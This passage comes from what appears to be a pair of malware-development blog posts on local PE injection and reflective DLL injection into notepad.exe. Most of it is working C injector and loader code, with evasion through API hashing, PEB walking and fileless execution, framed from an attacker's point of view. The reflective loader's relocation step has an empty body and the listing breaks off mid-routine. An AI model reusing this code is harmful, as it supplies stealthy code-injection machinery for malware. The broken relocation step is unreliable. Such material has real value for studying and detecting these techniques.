This form of injection is typically used in malware that is downloading another component, such as a second stage, to execute on a system.

Source Code for Examples

The associated code example for this post can be found on the following link.

Payload

int sendHTTPRequest() {

        LPCSTR userAgent = "agent";
        LPCSTR connectDomain = "google.com";
        LPCSTR httpRequestType = "GET";
        LPCSTR targetPath = "/test";

        HINTERNET internetHandle = InternetOpenA(userAgent, INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
        if (internetHandle == NULL) {
                return -1;
        }

        DWORD_PTR dwService = (DWORD_PTR)NULL;

        HINTERNET httpHandle = InternetConnectA(internetHandle, connectDomain, INTERNET_DEFAULT_HTTP_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, dwService);
        if (httpHandle == NULL) {
                return -1;
        }

        HINTERNET httpRequestHandle = HttpOpenRequestA(httpHandle, httpRequestType, targetPath, NULL, NULL, NULL, 0, dwService);
        if (httpRequestHandle == NULL) {
                return -1;
        }

        BOOL result = HttpSendRequestA(httpRequestHandle, NULL, 0, NULL, 0);
        InternetCloseHandle(internetHandle);

        return 1;
}

HTTP Request Function that acts as our "Payload'

The loopHTTPConnect function will be responsible for looping through the sendHTTPRequest function every two seconds.

void loopHTTPConnect() {

        while (true) {
                Sleep(2000);
                sendHTTPRequest();
                printf("Sent HTTP Request\n");
        }

}

Function that loops through the "Payload" function

int main() {

        printf("HTTP Payload Sending Starting\n");
        loopHTTPConnect();
}

The Payloads Main Function

Local Portable Executable Injector

The local portable executable injector will be responsible for loading the payload and executing it inside of itself as a new thread.

Load the Target Payload

        HANDLE hExePayloadFile = CreateFileA(&(exePath[0]), GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);
        if (hExePayloadFile == INVALID_HANDLE_VALUE) {
                std::cout << GetLastErrorAsString();
                return -1;
        }

        DWORD exePayloadFileSize = GetFileSize(hExePayloadFile, NULL);
        if (exePayloadFileSize == INVALID_FILE_SIZE) {
                std::cout << GetLastErrorAsString();
                return -1;
        }

        PIMAGE_DOS_HEADER pExePayloadUnmapped = (PIMAGE_DOS_HEADER)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, exePayloadFileSize);
        if (pExePayloadUnmapped == NULL) {
                std::cout << GetLastErrorAsString();
                return -1;
        }

        if (!ReadFile(hExePayloadFile, pExePayloadUnmapped, exePayloadFileSize, NULL, NULL)) {
                std::cout << GetLastErrorAsString();
                return -1;
        }

Reading the Payload from Disk into Memory

Map the Target Payload

At this point we have read the file into a buffer, however, we cannot execute the file yet. Most files at minimum will need to be mapped into memory and have a few alterations, such as resolving the Import Address Table (IAT) and updating the base relocation table. More over, the current file is in the heap which cannot run code.

First, we use VirtualAlloc to allocate memory that is readable, writable, and executable. The file we read from disk into the heap will be copied and run in this allocated buffer.

        PIMAGE_NT_HEADERS64 pExePayloadNTHeaders = (PIMAGE_NT_HEADERS64)(pExePayloadUnmapped->e_lfanew + (LPBYTE)pExePayloadUnmapped);
        PIMAGE_DOS_HEADER pExePayloadMapped = (PIMAGE_DOS_HEADER)VirtualAlloc(NULL, pExePayloadNTHeaders->OptionalHeader.SizeOfImage,
                MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

        if (pExePayloadMapped == NULL) {
                std::cout << GetLastErrorAsString();
                return -1;
        }

Making the entire allocated buffer readable, writable, and executable is a very lazy way of allocating memory and is easily detected by security software scanning memory pages and inspecting API calls, ideally only the .text section is made executble. However, for example purposes we will make the entire memory executable as well.

With the new buffer allocated, we then copy the PE headers from the heap to the new buffer.

        // Copy headers to mapped memory space

        DWORD totalHeaderSize = pExePayloadNTHeaders->OptionalHeader.SizeOfHeaders;
        memcpy_s(pExePayloadMapped, totalHeaderSize, pExePayloadUnmapped, totalHeaderSize);

Copy the PE headers to Buffer

PE files on disk have their sections stored at a raw offset, we need to reference each PE section header to find the virtual address each section will be stored at when the file is mapped into memory.

The next code snippet will loop through each PE section header to find the virtual address, and it will copy the section data from the heap buffer to the executable buffer, placing the section in the correct virtual address offset.

        // Map PE sections into mapped memory space

        DWORD numberOfSections = pExePayloadNTHeaders->FileHeader.NumberOfSections;
        PIMAGE_SECTION_HEADER pCurrentSection = (PIMAGE_SECTION_HEADER)(pExePayloadNTHeaders->FileHeader.SizeOfOptionalHeader + (LPBYTE)&(pExePayloadNTHeaders->OptionalHeader));

        for (DWORD i = 0; i < numberOfSections; i++, pCurrentSection++) {

                if (pCurrentSection->SizeOfRawData != 0) {
                        LPBYTE pSourceSectionData = pCurrentSection->PointerToRawData + (LPBYTE)pExePayloadUnmapped;
                        LPBYTE pDestinationSectionData = pCurrentSection->VirtualAddress + (LPBYTE)pExePayloadMapped;
                        DWORD sectionSize = pCurrentSection->SizeOfRawData;

                        memcpy_s(pDestinationSectionData, sectionSize, pSourceSectionData, sectionSize);
                }
        }

Copy the PE sections to Buffer

Update the Base Relocation Table

The Base Relocation Table will need to be updated in order to ensure that any hardcoded address in the DLL will resolve properly with the new base offset. Generally, you would want to check if there is a base relocation table present. In this case we have a static payload as an example that has a base relocation table.

        DWORD baseRelocationRVA = pExePayloadNTHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress;
        PIMAGE_BASE_RELOCATION pCurrentBaseRelocation = (PIMAGE_BASE_RELOCATION)(baseRelocationRVA + (LPBYTE)pExePayloadMapped);

        while (pCurrentBaseRelocation->VirtualAddress != NULL && baseRelocationRVA != 0) {

                DWORD relocationEntryCount = (pCurrentBaseRelocation->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(IMAGE_RELOC);
                PIMAGE_RELOC pCurrentBaseRelocationEntry = (PIMAGE_RELOC)((LPBYTE)pCurrentBaseRelocation + sizeof(IMAGE_BASE_RELOCATION));

                for (DWORD i = 0; i < relocationEntryCount; i++, pCurrentBaseRelocationEntry++) {
                        if (pCurrentBaseRelocationEntry->type == IMAGE_REL_BASED_DIR64) {

                                ULONGLONG* pRelocationValue = (ULONGLONG*)((LPBYTE)pExePayloadMapped + (ULONGLONG)((pCurrentBaseRelocation->VirtualAddress + pCurrentBaseRelocationEntry->offset)));
                                ULONGLONG updatedRelocationValue = (ULONGLONG)((*pRelocationValue - pExePayloadNTHeaders->OptionalHeader.ImageBase) + (LPBYTE)pExePayloadMapped);
                                *pRelocationValue = updatedRelocationValue;
                        }
                }

                // Increment current base relocation entry to the next one, we do this by adding its total size to the current offset
                pCurrentBaseRelocation = (PIMAGE_BASE_RELOCATION)((LPBYTE)pCurrentBaseRelocation + pCurrentBaseRelocation->SizeOfBlock);
        }

Update the Base Relocation Table

Resolve the IAT

Now that the PE Headers and PE Sections are mapped into the buffer the IAT will need to be resolved. This is important as the various functions used by the payload (HttpOpenRequestA, InternetConnectA, …) will not work if the IAT is not correctly updated.

        DWORD importDescriptorRVA = pExePayloadNTHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;
        PIMAGE_IMPORT_DESCRIPTOR pMappedCurrentDLLImportDescriptor = (PIMAGE_IMPORT_DESCRIPTOR)(importDescriptorRVA + (LPBYTE)pExePayloadMapped);

        while (pMappedCurrentDLLImportDescriptor->Name != NULL && importDescriptorRVA != 0) {
                LPSTR currentDLLName = (LPSTR)(pMappedCurrentDLLImportDescriptor->Name + (LPBYTE)pExePayloadMapped);
                HMODULE hCurrentDLLModule = LoadLibraryA(currentDLLName);

                if (hCurrentDLLModule == NULL) {
                        std::cout << GetLastErrorAsString();
                        return -1;
                }

                PIMAGE_THUNK_DATA64 pImageThunkData = (PIMAGE_THUNK_DATA64)(pMappedCurrentDLLImportDescriptor->FirstThunk + (LPBYTE)pExePayloadMapped);

                while (pImageThunkData->u1.AddressOfData) {

                        if (pImageThunkData->u1.Ordinal & 0x8000000000000000) {
                                // Import is by ordinal

                                FARPROC resolvedImportAddress = GetProcAddress(hCurrentDLLModule, MAKEINTRESOURCEA(pImageThunkData->u1.Ordinal));

                                if (resolvedImportAddress == NULL) {
                                        std::cout << GetLastErrorAsString();
                                        return -1;
                                }

                                // Overwrite entry in IAT with the address of resolved function
                                pImageThunkData->u1.AddressOfData = (ULONGLONG)resolvedImportAddress;

                        }
                        else {
                                // Import is by name
                                PIMAGE_IMPORT_BY_NAME pAddressOfImportData = (PIMAGE_IMPORT_BY_NAME)((pImageThunkData->u1.AddressOfData) + (LPBYTE)pExePayloadMapped);
                                FARPROC resolvedImportAddress = GetProcAddress(hCurrentDLLModule, pAddressOfImportData->Name);

                                if (resolvedImportAddress == NULL) {
                                        std::cout << GetLastErrorAsString();
                                        return -1;
                                }

                                // Overwrite entry in IAT with the address of resolved function
                                pImageThunkData->u1.AddressOfData = (ULONGLONG)resolvedImportAddress;

                        }

                        pImageThunkData++;
                }

                pMappedCurrentDLLImportDescriptor++;
        }

Resolve the IAT

Perform a Self Execution

In the end we have a readable, writable, and executable buffer with a memory mapped PE file. We can now retrieve the entry point of this PE file and start a new thread with CreateThread that will run in the local process. We use WaitForSingleObject with the INFINITE parameter so the main thread created by the operating system does not exit. If the WaitForSingleObject was not present our main thread would exit and the process would end.

            LPTHREAD_START_ROUTINE pExePayloadEntryPoint = (LPTHREAD_START_ROUTINE) (pExePayloadNTHeaders->OptionalHeader.AddressOfEntryPoint + (LPBYTE)pExePayloadMapped);
    
            HANDLE hThread = CreateThread(NULL, 0, pExePayloadEntryPoint, NULL, NULL, NULL);
            if (hThread == NULL) {
                    std::cout << GetLastErrorAsString();
                    return -1;
            }
    
            WaitForSingleObject(hThread, INFINITE);

Run Payload as a Thread

Local Portable Executable Injection Demonstration

The following GIF provides a video demonstration of the injection process. We can see the injector running and injecting into itself. Once the injection is successful we can see the output from the PE Payload printing to the console. Likewise, we can see HTTP traffic begin in Wireshark indicating a successful injection.

Injection Video Demonstration

Digging deeper into Process Hacker we can see a readable, writable, and executable memory section in the Injector process. This is the memory section that stores the PE payload which is being executed in a new thread.

Memory Space with Injected PE File

Reflective DLL Injection

Aleks — Wed, 24 May 2023 17:19:55 GMT

Introduction

This post will introduce Reflective DLL Injection along with the steps it takes to implement and execute this technique.

A previous post covered the concept of DLL Injection which makes use of the LoadLibraryW function to load a DLL from disk into a process via a thread created remotely. The downside of this option is that the DLL is stored on disk. From the point of view of attackers and malware developers you may not always wish to have your payloads on disk where it may be detected or copied for analysis.

Reflective DLL Injection aims to load a DLL into a specified process, just like traditional DLL Injection, however it aims to do this without dropping the DLL to disk. This is achieved by emulating the Windows Loader and having the DLL load itself in memory so it can be executed.

Source Code for Examples

The source code associated with this post can be found on the following link.

Introduction to DLL Injection

When a executable is launched on Windows it is first mapped into memory, this means that the file needs to be converted from the disk representation to the in-memory representation. There may be multiple parts of the file that require updating, however, most files will at minimum require:

Resolution of Import Address Table (IAT) and loading of associated DLLs.
Update values in the Base Relocation Table.

The core of Reflective DLL Injection is injecting a DLL into another process that has the capability to map itself into the same memory space. This has the benefit of keeping the DLL in memory as opposed to the disk.

Reflective DLL Injection Process Diagram Example

The following list out the steps of Reflective DLL Injection:

The Reflective DLL Injector will inject the DLL Payload into a target process. The DLL Payload a function will have independent code that when executed will help map the file into memory.
The independent code in the DLL is executed via CreateRemoteThread or any other means.
Through the independent code, the DLL Payload copies itself into another memory buffer in the same process and resolves that IAT and Base Relocation Table.
The independent code will then invoke DLLMain of the mapped DLL Payload.

💡

The independent code mentioned above could be called shellcode, however, since the code is written in C to be independent and is never transferred anywhere in its pure byte/opcode representation I have decided to call it "Independent Code".

Reflective DLL Payload

The Reflective DLL Payload is the main payload that has the core logic we want to execute in the target process. The file has a function sendHTTPRequest that will call out to Google through a HTTP request. This was picked for example purposes in order to have visible feedback from when the payload is executed.

int sendHTTPRequest() {


        LPCSTR userAgent = "agent";
        LPCSTR connectDomain = "google.com";
        LPCSTR httpRequestType = "GET";
        LPCSTR targetPath = "/test";

        HINTERNET internetHandle = InternetOpenA(userAgent, INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
        if (internetHandle == NULL) {
                return -1;
        }

        DWORD_PTR dwService = (DWORD_PTR)NULL;

        HINTERNET httpHandle = InternetConnectA(internetHandle, connectDomain, INTERNET_DEFAULT_HTTP_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, dwService);
        if (httpHandle == NULL) {
                return -1;
        }

        HINTERNET httpRequestHandle = HttpOpenRequestA(httpHandle, httpRequestType, targetPath, NULL, NULL, NULL, 0, dwService);
        if (httpRequestHandle == NULL) {
                return -1;
        }

        BOOL result = HttpSendRequestA(httpRequestHandle, NULL, 0, NULL, 0);
        InternetCloseHandle(internetHandle);

        return 1;
}

HTTP Request Function that acts as our "Payload'

A function named loopHTTPConnect will loop through the sendHTTPRequest function.

void loopHTTPConnect() {

        while (true) {
                Sleep(5000);
                sendHTTPRequest();
        }

}

Function that loops through the "Payload" function

The loopHTTPConnect function is initially invoked through the DLL's DLLMail, which is run when the DLL file is loaded by a process.

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{

        HANDLE hThread = NULL;

    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
                hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)loopHTTPConnect, NULL, 0, NULL);

                if (hThread == NULL) {
                        return FALSE;
                }
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

HTTP Loop Function Invoked in DLLMain

Reflective DLL Injector

The Reflective DLL Injector is responsible for injecting the DLL Payload into a target process and invoking the independent code that will help the payload run itself.

This Reflective DLL Injector will take the payload from disk, however, this is only for testing and proof of concept purposes. In a real world scenario the payload could be on disk in an obfuscated or encrypted format, embedded within the Reflective DLL Injector itself, or even downloaded from the network.

When the Reflective DLL Injector gets ahold of the Reflective DLL Payload the first step is to find the offset of the independent code that will help the Reflective DLL Payload load itself in memory. In this case our independent code is an exported function named ReflectiveLoader, in order to find the offset we need to reference the export table and find the RVA of the ReflectiveLoader function. Once found we can then use this when we are creating a remote thread in the target process to execute this code.

        PIMAGE_NT_HEADERS64 pImageNTHeaders = (PIMAGE_NT_HEADERS64)(pDLLPayloadInHeap->e_lfanew + (LPBYTE)pDLLPayloadInHeap);
        PIMAGE_OPTIONAL_HEADER64 pImageOptionalHeader = &pImageNTHeaders->OptionalHeader;


        DWORD virtualAddressOfExportDirectory = pImageOptionalHeader->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
        PIMAGE_EXPORT_DIRECTORY pExportDirectory = (PIMAGE_EXPORT_DIRECTORY) ConvertRVAToOffset(pDLLPayloadInHeap, virtualAddressOfExportDirectory);

        DWORD numberOfNames = pExportDirectory->NumberOfNames;
        DWORD* pAddressOfNames = (DWORD* ) ConvertRVAToOffset(pDLLPayloadInHeap, pExportDirectory->AddressOfNames);
        DWORD reflectiveLoaderExportOffset = 0;

        for (DWORD i = 0; i < numberOfNames; i++) {
                char* currentExportFunctionName = (char*) ConvertRVAToOffset(pDLLPayloadInHeap, pAddressOfNames[i]);

                if (strcmp(currentExportFunctionName, "ReflectiveLoader") == 0) {

                        WORD* pAddressOfNameOrdinals = (WORD*)ConvertRVAToOffset(pDLLPayloadInHeap, pExportDirectory->AddressOfNameOrdinals);
                        WORD currentExportFunctionOrdinal = pAddressOfNameOrdinals[i];

                        DWORD* pAddressOfFunction = (DWORD*)ConvertRVAToOffset(pDLLPayloadInHeap, pExportDirectory->AddressOfFunctions);
                        DWORD reflectiveLoaderRVA = pAddressOfFunction[currentExportFunctionOrdinal];

                        reflectiveLoaderExportOffset = (DWORD)(ConvertRVAToOffset(pDLLPayloadInHeap, reflectiveLoaderRVA) - (ULONG_PTR)pDLLPayloadInHeap);

                        break;
                }
        }

        if (reflectiveLoaderExportOffset == 0) {
                printf("Failed to locate ReflectiveLoader export\n");
                return -1;
        }

Parsing the DLL Payload Export Table to Locate ReflectiveLoader

The next section will open a handle to any process named notepad.exe, this will be the process we want to inject the DLL Payload into.

        // Find PID of Target Process
        LPCWSTR injectionTargetProcess = L"notepad.exe";
        DWORD injectionTargetProcessID = FindProcessID((LPWSTR)injectionTargetProcess);

        if (injectionTargetProcessID == -1) {
                wprintf(L"Could not find process: %ls", injectionTargetProcess);
                return 0;
        }

        wprintf(L"Injecting into %ls (%d)\n", injectionTargetProcess, injectionTargetProcessID);

        HANDLE hTargetProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, FALSE, injectionTargetProcessID);
        if (hTargetProcess == NULL) {
                std::string errorMessage = GetLastErrorAsString();
                std::cout << "Failed to aquire handle to process: " << errorMessage << "\n";
                return -1;
        }

Open a Handle to notepad.exe

Once a handle is opened to notepad.exe a new buffer is allocated via VirtualAllocEx and the Reflective DLL Payload is copied over to the target process.

        LPVOID remoteBuffer = VirtualAllocEx(hTargetProcess, NULL, dllPayloadSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
        if (remoteBuffer == NULL) {
                std::string errorMessage = GetLastErrorAsString();
                std::cout << "Failed to aquire handle to process: " << errorMessage << "\n";
                return -1;
        }

        if (!WriteProcessMemory(hTargetProcess, remoteBuffer, (LPVOID)pDLLPayloadInHeap, dllPayloadSize, NULL)) {
                std::string errorMessage = GetLastErrorAsString();
                std::cout << "Failed to aquire handle to process: " << errorMessage << "\n";

                VirtualFreeEx(hTargetProcess, remoteBuffer, 0, MEM_RELEASE);
                CloseHandle(hTargetProcess);

                return -1;
        }

After running VirtualAllocEx and copying the DLL Payload into the memory it allocated we have our Reflective DLL Payload in the target process and we know the offset of the ReflectiveLoader independent code.

The last step involves creating a remote thread in the target process via CreateRemoteThread that will execute the independent code in the ReflectiveLoader function.

        LPTHREAD_START_ROUTINE lpStartAddress = (LPTHREAD_START_ROUTINE) ((LPBYTE) remoteBuffer + reflectiveLoaderExportOffset);

        HANDLE hThread = CreateRemoteThread(hTargetProcess, NULL, 0, lpStartAddress, NULL, 0, NULL);
        if (hThread == NULL) {
                std::string errorMessage = GetLastErrorAsString();
                std::cout << "Remote thread failed " << errorMessage << "\n";

                VirtualFreeEx(hTargetProcess, remoteBuffer, 0, MEM_RELEASE);
                CloseHandle(hTargetProcess);

                return -1;
        }

Create a Remote Thread to Execute the ReflectiveLoader Function in the Target Process Memory Space

Now we have the Reflective DLL Payload loaded in the memory of the target process. However, the file itself is still in a on-disk format. This means we will never be able to execute DLLMain and have the program run gracefully.

The current execution has been passed to our function containing independent code named ReflectiveLoader by the Reflective Loader Injector. This is the core code that will convert this on-disk representation of the code to a in-memory representation and allow us to call DllMain.

Reflective Loading in the DLL Payload

The following will now expand on the details involved in the Reflective DLL implementation. The following code snippets are realted to the independent code found in ReflectiveLoader.

Find The Base Address of the Reflective DLL Payload

The first step for the DLL file to parse itself is to understand the base address it is located at. The ReflectiveLoader function was called without any parameters and as a result has no information about the environment it is in.

The first step to do this is to execute a GetCurrentInstructionPointer which will return the RIP of the caller.

__declspec(noinline) ULONG_PTR GetCurrentInstructionPointer(VOID) { return (ULONG_PTR)_ReturnAddress(); }

Helper Function to Retreive the Instruction Pointer

Once the program knows its current RIP it can start working upwards until it reaches the header of the file. The header of the PE file is identified by the MZ bytes, however, we also check against the PE header found in the NT Headers in order to avoid false positives.

        ULONG_PTR pCurrentInstructionPointer = GetCurrentInstructionPointer();
        PIMAGE_DOS_HEADER pCurrentDLLModule = (PIMAGE_DOS_HEADER)pCurrentInstructionPointer;


        while (TRUE) {

                if (pCurrentDLLModule->e_magic == IMAGE_DOS_SIGNATURE) {

                        // some x64 dll's can trigger a bogus signature (IMAGE_DOS_SIGNATURE == 'POP r10'),
                        // we sanity check the e_lfanew with an upper threshold value of 1024 to avoid problems.
                        // Reference: https://github.com/stephenfewer/ReflectiveDLLInjection/blob/178ba2a6a9feee0a9d9757dcaa65168ced588c12/dll/src/ReflectiveLoader.c#L94
                        if (pCurrentDLLModule->e_lfanew >= sizeof(IMAGE_DOS_HEADER) && pCurrentDLLModule->e_lfanew < 1024) {
                                PIMAGE_NT_HEADERS64 pSuspectedNtHeaders = (PIMAGE_NT_HEADERS64)(pCurrentDLLModule->e_lfanew + (LPBYTE)pCurrentDLLModule);
                                if (pSuspectedNtHeaders->Signature == IMAGE_NT_SIGNATURE) {
                                        break;
                                }
                        }
                }

                pCurrentDLLModule = (PIMAGE_DOS_HEADER)((LPBYTE)pCurrentDLLModule - 1);
        }

Once this is finished running we will have a pointer to the beginning of the memory space where the DLL has been placed.

Dynamically load and resolve LoadLibraryA, GetProcAddress, and VirtualAlloc

Since the ReflectiveLoader needs to be independent it cannot invoke any functions directly or have any embeded references to strings. This requires us to:

Dynamily resovle the location of Kernel32.dll
Dynamicly resolve the address of LoadLibraryA, GetProcAddress, and VirtualAlloc
Make use of API Hashing to avoid any references to strings

The API Hash routine is a fairly simple one and will allow us to avoid the usage of direct strings in the code (as an alternative stack strings could have been used). In the case of this API Hash routine we will pass in the strings and comapre the resulting hash against a value we are expecting, such as 0x50c4067 which is the hash for KERNEL32.DLL.

DWORD GetHashFromStringA(LPSTR string) {

        SIZE_T stringSize = GetSizeOfStringA(string);
        DWORD hash = 0x35;

        for (SIZE_T i = 0; i < stringSize; i++) {
                hash += (hash * 0xab10f29e + string[i]) & 0xffffff;
        }

        return hash;
}

API Hasing Algorithm

In a x64 process the GS segment register will hold the address of the Thread Environment Block (TEB). 60 bytes after the start of the TEB is a address to the Process Environment Block (PEB).

We are interested in the PEB as it will provide us access to a data strucure indicating all the loaded modules in the current process, including the address of Kernel32.dll.

        // Through PEB find the base address of Kernel32.dll

        _PPEB pPEB = (_PPEB)__readgsqword(0x60);
        PLDR_DATA_TABLE_ENTRY pCurrentPLDRDataTableEntry = (PLDR_DATA_TABLE_ENTRY)pPEB->pLdr->InMemoryOrderModuleList.Flink;
        ULONG_PTR pKernel32Module = NULL;

Get a Pointer to the PEB

Each currently loaded module is looped through and the hashed name of that module is compared to the Kernel32.dll string hash that we are expecting. Once the correct string is found the base address of the module is saved.

        do {
                PWSTR currentModuleString = pCurrentPLDRDataTableEntry->BaseDllName.pBuffer;
                if (GetHashFromStringW(currentModuleString) == KERNEL32DLL_HASH) {
                        pKernel32Module = (ULONG_PTR)pCurrentPLDRDataTableEntry->DllBase;
                        break;
                }

                pCurrentPLDRDataTableEntry = (PLDR_DATA_TABLE_ENTRY)pCurrentPLDRDataTableEntry->InMemoryOrderModuleList.Flink;

        } while (pCurrentPLDRDataTableEntry->TimeDateStamp != 0);

Parse the Loaded Modules Looking for Kernel32.dll

After the address of Kernel32.dll is found the functions of interest can be resolved to their address and used later in the program.

        VIRTUALALLOC pVirtualAlloc = (VIRTUALALLOC)GetFunctionOffset(VIRTUALALLOC_HASH, (PIMAGE_DOS_HEADER)pKernel32Module);
        FLUSHINSTRUCTIONCACHE pFlushInstructionCache = (FLUSHINSTRUCTIONCACHE)GetFunctionOffset(FLUSHINSTRUCTIONCACHE_HASH, (PIMAGE_DOS_HEADER)pKernel32Module);
        LOADLIBRARYA pLoadLibraryAAddress = (LOADLIBRARYA)GetFunctionOffset(LOADLIBRARYA_HASH, (PIMAGE_DOS_HEADER)pKernel32Module);
        GETPROCADDRESS pGetProcAddressAddress = (GETPROCADDRESS)GetFunctionOffset(GETPROCADDRESS_HASH, (PIMAGE_DOS_HEADER)pKernel32Module);

Resolve Functions via API Hashing

Make a mapped copy of the Reflective DLL Payload

Now we can start using the Win32 API functions that have been resolved. The first step is to allocate a new buffer space into which the DLL will be mapped.

Note, we are making an exact replica of the DLL Payload that has already been copied into the memory space of the process.

        // Find SizeOfImage from the current DLL in memory
        PIMAGE_NT_HEADERS pCurrentDLLModuleNTHeaders = (PIMAGE_NT_HEADERS)(pCurrentDLLModule->e_lfanew + (LPBYTE)pCurrentDLLModule);
        DWORD sizeOfImageOfCurrentDLLModule = pCurrentDLLModuleNTHeaders->OptionalHeader.SizeOfImage;

        // Allocate enough space to copy the DLL over and map it in memory
        LPVOID pMappedCurrentDLL = pVirtualAlloc(NULL, sizeOfImageOfCurrentDLLModule, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

Allocate a Second Buffer to store a Replica of DLL Payload

The first part of the mapping process is to copy the PE headers into the newly allocated buffer.

        // Copy PE headers to pMappedCurrentDLL
        DWORD sizeOfHeaders = pCurrentDLLModuleNTHeaders->OptionalHeader.SizeOfHeaders;
        for (DWORD i = 0; i < sizeOfHeaders; i++) {
                ((LPBYTE)pMappedCurrentDLL)[i] = ((LPBYTE)pCurrentDLLModule)[i];
        }

Copy the DLL Payload PE Headers into Newly Allocated Memory

Next each PE section will need to be copied to the newly allocated buffer at the virtual address offsets. This is critical to the process of mapping the DLL.

        DWORD numberOfSections = pCurrentDLLModuleNTHeaders->FileHeader.NumberOfSections;

        PIMAGE_OPTIONAL_HEADER64 pCurrentDLLModuleOptionalHeader = &pCurrentDLLModuleNTHeaders->OptionalHeader;
        PIMAGE_SECTION_HEADER pCurrentSectionHeader = (PIMAGE_SECTION_HEADER)(pCurrentDLLModuleNTHeaders->FileHeader.SizeOfOptionalHeader + (LPBYTE)pCurrentDLLModuleOptionalHeader);

        for (DWORD i = 0; i < numberOfSections; i++) {

                if (pCurrentSectionHeader->SizeOfRawData != 0) {
                        LPBYTE pDestinationAddress = (LPBYTE)pMappedCurrentDLL + pCurrentSectionHeader->VirtualAddress;
                        LPBYTE pSourceAddress = (LPBYTE)pCurrentDLLModule + pCurrentSectionHeader->PointerToRawData;
                        DWORD currentSectionRawSize = pCurrentSectionHeader->SizeOfRawData; // We copy the entire section, if an entire section is not needed in memory the uneeded portion will be overwritten by another section

                        for (DWORD i = 0; i < currentSectionRawSize; i++) {
                                pDestinationAddress[i] = pSourceAddress[i];
                        }
                }

                pCurrentSectionHeader++;
        }

Map the PE Sections into Memory

Resolve the IAT of the Mapped Version of Reflective DLL Payload

        PIMAGE_NT_HEADERS64 pMappedCurrentDLLNTHeader = (PIMAGE_NT_HEADERS64)(((PIMAGE_DOS_HEADER)pMappedCurrentDLL)->e_lfanew + (LPBYTE)pMappedCurrentDLL);
        PIMAGE_IMPORT_DESCRIPTOR pMappedCurrentDLLImportDescriptor = (PIMAGE_IMPORT_DESCRIPTOR)(pMappedCurrentDLLNTHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress + (LPBYTE)pMappedCurrentDLL);

        while (pMappedCurrentDLLImportDescriptor->Name != NULL) {
                LPSTR currentDLLName = (LPSTR)(pMappedCurrentDLLImportDescriptor->Name + (LPBYTE)pMappedCurrentDLL);
                HMODULE hCurrentDLLModule = pLoadLibraryAAddress(currentDLLName);

                PIMAGE_THUNK_DATA64 pImageThunkData = (PIMAGE_THUNK_DATA64)(pMappedCurrentDLLImportDescriptor->FirstThunk + (LPBYTE)pMappedCurrentDLL);

                while (pImageThunkData->u1.AddressOfData) {

                        if (pImageThunkData->u1.Ordinal & 0x8000000000000000) {
                                // Import is by ordinal

                                FARPROC resolvedImportAddress = pGetProcAddressAddress(hCurrentDLLModule, MAKEINTRESOURCEA(pImageThunkData->u1.Ordinal));

                                if (resolvedImportAddress == NULL) {
                                        return;
                                }

                                // Overwrite entry in IAT with the address of resolved function
                                pImageThunkData->u1.AddressOfData = (ULONGLONG)resolvedImportAddress;

                        }
                        else {
                                // Import is by name
                                PIMAGE_IMPORT_BY_NAME pAddressOfImportData = (PIMAGE_IMPORT_BY_NAME)((pImageThunkData->u1.AddressOfData) + (LPBYTE)pMappedCurrentDLL);
                                FARPROC resolvedImportAddress = pGetProcAddressAddress(hCurrentDLLModule, pAddressOfImportData->Name);

                                if (resolvedImportAddress == NULL) {
                                        return;
                                }

                                // Overwrite entry in IAT with the address of resolved function
                                pImageThunkData->u1.AddressOfData = (ULONGLONG)resolvedImportAddress;

                        }

                        pImageThunkData++;
                }

                pMappedCurrentDLLImportDescriptor++;
        }

Resolve IAT

Update the Base Relocation Table of the Reflective DLL Payload

Lastly, the Base Relocation Table will need to be updated in order to ensure that any hardcoded address in the DLL will resolve properly with the new base offset.

        DWORD numberOfRelocEntires;
        PIMAGE_BASE_RELOCATION pCurrentBaseRelocation = (PIMAGE_BASE_RELOCATION)(pMappedCurrentDLLNTHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress + (LPBYTE)pMappedCurrentDLL);
        PIMAGE_RELOC pCurrentBaseRelocationEntry;

        while (pCurrentBaseRelocation->VirtualAddress != 0) {

                numberOfRelocEntires = ((pCurrentBaseRelocation->SizeOfBlock) - 0x8) / 0x2;
                pCurrentBaseRelocationEntry = (PIMAGE_RELOC)((LPBYTE)pCurrentBaseRelocation + sizeof(IMAGE_BASE_RELOCATION));

                for (DWORD i = numberOfRelocEntires; i != 0; i--) {
                        if (pCurrentBaseRelocationEntry->type == IMAGE_REL_BASED_DIR64) {
                        }
                        pCurrentBaseRelocationEntry++;
                }

                pCurrentBaseRelocation = (PIMAGE_BASE_RELOCATION)((LPBYTE)pCurrentBaseRelocation + pCurrentBaseRelocation->SizeOfBlock);
        }

Fix the Base Reallocation Table

Invoke DLLMain of the Reflective DLL Payload

Now with the DLL Headers and PE Sections mapped, IAT entries resovled, and Base Relocation Table fixed the DLLMain of the DLL can be invoked.

        ULONG_PTR pDllEntryPoint = (ULONG_PTR)(pMappedCurrentDLLNTHeader->OptionalHeader.AddressOfEntryPoint + (LPBYTE)pMappedCurrentDLL);

        pFlushInstructionCache((HANDLE)-1, NULL, 0);

